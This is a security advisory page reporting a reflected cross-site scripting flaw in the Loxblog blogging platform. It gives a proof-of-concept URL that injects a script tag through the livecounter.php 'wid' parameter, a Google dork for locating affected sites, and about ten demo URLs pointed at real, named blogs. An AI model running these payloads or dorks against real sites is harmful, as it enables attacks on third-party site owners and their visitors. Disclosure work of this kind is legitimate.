Loxblog cross-site scripting Vulnerability

2017.10.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[-] Exploit Title: Loxblog cross-site scripting Vulnerability [-] Vendor Homepage: http://www.loxblog.com/ [-] Google Dork: inurl:".loxblog.com" or inurl:".loxtarin.com" or inurl:".lxb.ir" or inurl:".mahtarin.ir" [-] Author: Milad Ahmadi [-] Date: Thursday, October 19, 2017 [-] Version: All [-] Tested on Windows 10 --------------------------------------------------------------------- [ Description ] # Loxblog is one of the most popular blogging system in Iran with more than 5 years of work experience, this free blogging system is vulnerable to reflected cross-site scripting attacks. --------------------------------------------------------------------- [ Proof Of Concept] http://site.com/important/livecounter.php?ads=0&wid=855826'><script>alert(0)</script> --------------------------------------------------------------------- [ Demo ] http://www.loxblog.com/important/livecounter.php?ads=0&wid=855826%27%3E%3Cscript%3Ealert(0)%3C/script%3E http://www.kanaf-iran.ir/important/livecounter.php?ads=0&wid=855826%27%3E%3Cscript%3Ealert(0)%3C/script%3E http://www.iran-nama.ir/important/livecounter.php?ads=0&wid=855826%27%3E%3Cscript%3Ealert(0)%3C/script%3E http://www.jelveyenuref.lxb.ir/important/livecounter.php?ads=0&wid=855826%27%3E%3Cscript%3Ealert(0)%3C/script%3E http://www.gadim.lxb.ir/important/livecounter.php?ads=0&wid=855826%27%3E%3Cscript%3Ealert(0)%3C/script%3E http://www.sherazza.lxb.ir/important/livecounter.php?ads=0&wid=855826%27%3E%3Cscript%3Ealert(0)%3C/script%3E http://www.dehyarifayzabad.lxb.ir//important/livecounter.php?ads=0&wid=855826%27%3E%3Cscript%3Ealert(0)%3C/script%3E http://www.sefidgroup1375.lxb.ir/important/livecounter.php?ads=0&wid=855826%27%3E%3Cscript%3Ealert(0)%3C/script%3E http://www.alirn440.lxb.ir//important/livecounter.php?ads=0&wid=855826%27%3E%3Cscript%3Ealert(0)%3C/script%3E http://www.luhan-baekhyun-a1.lxb.ir//important/livecounter.php?ads=0&wid=855826%27%3E%3Cscript%3Ealert(0)%3C/script%3E ---------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top